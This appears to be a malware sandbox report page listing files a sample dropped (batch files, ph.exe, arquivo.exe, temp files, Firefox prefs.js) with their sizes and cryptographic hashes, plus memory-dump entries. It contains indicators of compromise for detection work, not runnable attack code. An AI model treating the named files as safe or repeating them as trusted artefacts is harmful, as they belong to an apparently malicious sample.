                                    d101b2d34646c2ffb07658de9e068513f7cc1e1ce5982992d68bfaca4f0b3496d42f02bdff0d56b1b7300ebea8bc6e04667dff6ba5669ff55220fc3f46798ce4

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    99ce3fba31e21460c577c0cd40ea67c2

                                    SHA1

                                    54aaca8a32377d015b600d5d9d1e0054491fca0b

                                    SHA256

                                    9fe9f3bdea04ada3394e6dc7f1710370b7a31560fb01be29775c295a392bda00

                                    SHA512

                                    89f144415f11101cc9ab93dcd2eaf50cd4f2f02268c845159dc574966993a3c789ab1aaf3c13aebd554b1942815d6307df4679a316e7df0b3aca8559b8ef496d

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    378ccb4f2822a4c95f8329770f2ac607

                                    SHA1

                                    3c3ccca03d2ec971b21ca8359000f6dabed89209

                                    SHA256

                                    8e4688873f3fb347d4a431e49d278958ddea265d35180b6994531e08ec682b67

                                    SHA512

                                    6b2ceecd14f1e0f51d7c07d9ad30fdd3f2b306e4978e1b24bbc62b44d3141b3c76b47b395126dd58bef208da2be80ecda602a427f77d98d46a7526fa91c5e23f

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    88ba1ff63ca1a322e6a40266d91305b4

                                    SHA1

                                    6f46e204af01d2efceb70069f54ee3dca463e0e7

                                    SHA256

                                    2986294d3b05ad58c3503b6f5d046e50b83f9d041310964b5b77cdadfe3cfbf4

                                    SHA512

                                    25b3d88c87c732e2ff26d1c174fdcaf9ae872659f54d2fc8a6c1df847d3e3ef6367cd64dcb49a85baaee913a4bfcb2d7006b0e7c2bca3a371a70276cc58d9848

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    3bcfc1693f3a842e3976af560286d032

                                    SHA1

                                    0e505e3d6c0cf7370e655882bd8b24f150ed9133

                                    SHA256

                                    2c676de673750afc5dbe010981024b604866c7d4e0f598b1ddfbbe0d4d1071c7

                                    SHA512

                                    77dac75786ecf64dc600c915eeb01cf37ac037ce301e6613c0df9f0993d34cb8a6342882811491b12ddd61654e95a4b2ab2a42f602fbc655e808668b8a8b01ac

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    3de565990e05c77b40d77eb64b97ccec

                                    SHA1

                                    d2a1a450fdb896ebff3730405cce1ac712f731f0

                                    SHA256

                                    db1b209c8b0a2bc10207c14379316de040d598634f7bc432a8a70489e022d3e2

                                    SHA512

                                    0f3020cd4fcf6cf1399580e5de37751b4c5b389ebe219201a2243bad280845dff106da058ecc78257397b29e00cc2aecf7521529ced07daba662ff1ba02a9e74

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    b9001e640d7a170925ecddff3d571a20

                                    SHA1

                                    35fba5b2a7ba6f7ce4cf6ea96940caa1544336b1

                                    SHA256

                                    a8c07af1303a13865a69320747ec8d65d23e3cf907078c244ddeff7c90013e34

                                    SHA512

                                    4c02b07f61d11311c35f7a1577127e29c6a09a4b264c2e48df12436371d45fd35b95402f0797bf660f1d1eab6d5ec0e45b3118853f54d4e9b9c9a2edbbd8fa67

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    6f160b3dcad8e0e08838a791ea049fe1

                                    SHA1

                                    d7d9acd636e4d812a1909295605c10d23f16d5e1

                                    SHA256

                                    8682a5fab91e7df34d9fea453bbdb5300e2cba7138b5d6c4f6453955a26e95be

                                    SHA512

                                    a521af1e23b1b26b8cbbdf6c544a4db8c30de540cf9cbfcb93a9d4aafb2c521062052c70317e0edc0a1d9d89d30957c506b4f8034c16ce08b7b4d5ef968434b3

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    17812a43cf89f87c21bd4c1874e2c2c7

                                    SHA1

                                    ece60afc9a08d90cd14d0a31c450d75b60d00c93

                                    SHA256

                                    96ff77f129d1229d592596b92dece520531272ea1782d12ef7f2dc1945273326

                                    SHA512

                                    108ba4919efaeb436b48fbca0b331938d9567610076cd435304313d3de49dc783265bfa8f4bc0ce38be0f84568b03d675cd2a005f3ef4173a2adfcb57afded1f

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    b727249ab65359e9eb10593915634369

                                    SHA1

                                    349803ad1a646d2c349aac7eeca34faa4610a044

                                    SHA256

                                    87bca5a52da3d7acd0b65ca7c3cdce11a03cdf39a6f0dc3878e3fe711716b2f2

                                    SHA512

                                    cbda923c511c8e46c4ed81e0a7ab867d919425abf9b27bbcf4ebeadbdd5aa71ce8a9f8fb46beb11f0ede751bc5d73c6ee342c754c6d41b4677bb11714c073af2

                                    Download Submit

                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                                    Filesize

                                    342B

                                    MD5

                                    d2d78c73d719a6d1eddcb6bd8483cdce

                                    SHA1

                                    f2d166dcb7e104923d9f49c04eb7fbd6fba5439b

                                    SHA256

                                    44f75a961d0ace0a1d059b33571ad62b49473c993427e023c2b6f3d878c07369

                                    SHA512

                                    c88340bd1ae22b32ec7d047c22951bb5934252e8e2f9db22136fb15ec3ccf65c43b14a6ee476b5581eb823a41ecf11be4602f319b99a69756088add3ff1e63a3

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\7E54.tmp\arquivo.bat
                                    Filesize

                                    936B

                                    MD5

                                    f1e34cf1c5526c36284cd5d2a3ef7206

                                    SHA1

                                    cac3eadcd17148bb011b6d0f4a79561c471b4009

                                    SHA256

                                    e01d9192143cf6b0605b00b80be30f0398f2692a4a7bb52eb737e649f660dd4c

                                    SHA512

                                    7febedeef66bd3ca00223a090ddbd756a7ebab632da9af1f1dc6ae5d1509bb5ff3e0a0853f35225e1d7fe2a49afa9d81d26713b0224fa1c1997ebaee20570d60

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\7EE0.tmp\video.bat
                                    Filesize

                                    5KB

                                    MD5

                                    75de38d95094d4fe4559229ba200f9bd

                                    SHA1

                                    ab949f948430fdb8215e8d65eea8a02295f03125

                                    SHA256

                                    327cb508497a28fc5833ee896cd3f8f068552a1deb1ae9ed2436dbf97aaff727

                                    SHA512

                                    4385b2a05dc4b500b68e5e1b8ebd67b3db2555e5fe07bdddc4295cb0976f6cdf9299b6b51d206d6c11ffdb48c5f388ea63b9c7362fd6c9b6d02d7d2787e78cad

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\Cab9C04.tmp
                                    Filesize

                                    70KB

                                    MD5

                                    49aebf8cbd62d92ac215b2923fb1b9f5

                                    SHA1

                                    1723be06719828dda65ad804298d0431f6aff976

                                    SHA256

                                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                    SHA512

                                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\Tar9CB3.tmp
                                    Filesize

                                    181KB

                                    MD5

                                    4ea6026cf93ec6338144661bf1202cd1

                                    SHA1

                                    a1dec9044f750ad887935a01430bf49322fbdcb7

                                    SHA256

                                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                    SHA512

                                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\ph.exe
                                    Filesize

                                    61KB

                                    MD5

                                    ee8a0f94abf33d5f17cf2f65f0417f94

                                    SHA1

                                    d01e771c0f850bd54cb5e92fe4e7dbab3cf20f9d

                                    SHA256

                                    5dd2d3f78863c50bca677ae611583e3481040eac5c24d9d8fbcda2482331f0cb

                                    SHA512

                                    8f038927934397149b408650655e39b3680d062e1e20f095ac5a2b8109149cd176a32f264af10df592ebbe66e8077f8751fd9b56f4b650f3a85ab146d333c826

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\~i.tmp
                                    Filesize

                                    935B

                                    MD5

                                    a06ec456179f0f64755bfe2ee08b02f3

                                    SHA1

                                    d108ba8b679658989bcb55b3d280a6ffe4044dda

                                    SHA256

                                    4ec238a2833e0989c712bf846c3291008f0fe156e6fe2ed801a61c375546d275

                                    SHA512

                                    2ce5f39e87785fe843077f36da44c54ccc60d0c5b79fd625bb9465ecfa6470e3f3e2f04ad7a47fefd2c8ee6e4780d9d11937bea8fe2d86c5c07d15b1f7c76817

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\~r.tmp
                                    Filesize

                                    3.5MB

                                    MD5

                                    7458c26af71ad5a4cead9709bc53c59d

                                    SHA1

                                    96c3864e03c41a029afc7686c7f623030f71725a

                                    SHA256

                                    defa46badeaafb839b19598402235855499c3469e4addca169808719284f6af4

                                    SHA512

                                    a2b35dfd83d79627f480749db761b43e00b95d00b3f6805f24f5762cb4d2e98059c21c22b4561b6955178cc220a04b2b38167616c8d0f1999304e15e53f4ed7f

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js
                                    Filesize

                                    6KB

                                    MD5

                                    39ede8695a74f2edef2c09fa1face778

                                    SHA1

                                    45a777705d9ba3858d4837e9b51b2fc52b9bffb4

                                    SHA256

                                    9515eb04f6e40d7dce72b217a0aaee7ff968a7e79bef818f7dbaa99e7801346a

                                    SHA512

                                    0585383791578fe3117688f24aa0fddae123200d689a2a75e10b4359610708115a42f72a7c2e50947106a840fb052889dddce7352525af8fbf27fe9a58b267e9

                                    Download Submit

                                  • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\id09dv1m.default-release\prefs.js
                                    Filesize

                                    6KB

                                    MD5

                                    1ab2cb857a14eb744f2fc4bb1ca1e586

                                    SHA1

                                    2f8e4edc03d401a3ced520585225f38e159afc82

                                    SHA256

                                    0a29a2e8f1c04d4c30f995b73857cdca85ca12fe276b6bb6f9232aae31f73923

                                    SHA512

                                    d0c78e645045cd0f802902a8acd96adefcd419246e10b4a0066dd0d119f2ab615fb6f0e65696b5b9b39371b3a20ba03a4262e815015214197a4e19ba5286576a

                                    Download Submit

                                  • \Users\Admin\AppData\Local\Temp\arquivo.exe
                                    Filesize

                                    21KB

                                    MD5

                                    b20675bbb62af8db4294ff7eaeae554c

                                    SHA1

                                    69dfadd28ff065fe6eeb49eb9d574b28fb2b6aea

                                    SHA256

                                    25dac9346ab7d09c0655f2e723b17e478ce821e7170934f6ffbf00e779910cf7

                                    SHA512

                                    c078a006998adc3d8e28587f2b60e930a832a9dd12d2c149911e7204dccdf73a097bb71d4afc7c7fbd2a99fb7a018c2769aa69a636ff022c7f19cb8da9cf7e53

                                    Download Submit

                                  • memory/2312-7-0x0000000000B50000-0x0000000000B60000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2312-12-0x0000000000B50000-0x0000000000B60000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2772-14-0x0000000000400000-0x0000000000410000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2772-109-0x0000000000400000-0x0000000000410000-memory.dmp

                                    Filesize

                                    64KB

                                    Download

                                  • memory/2820-106-0x0000000000400000-0x0000000000425000-memory.dmp

                                    Filesize

                                    148KB

                                    Download

                                  • memory/2832-32-0x0000000000180000-0x00000000001A5000-memory.dmp

                                    Filesize

                                    148KB

                                    Download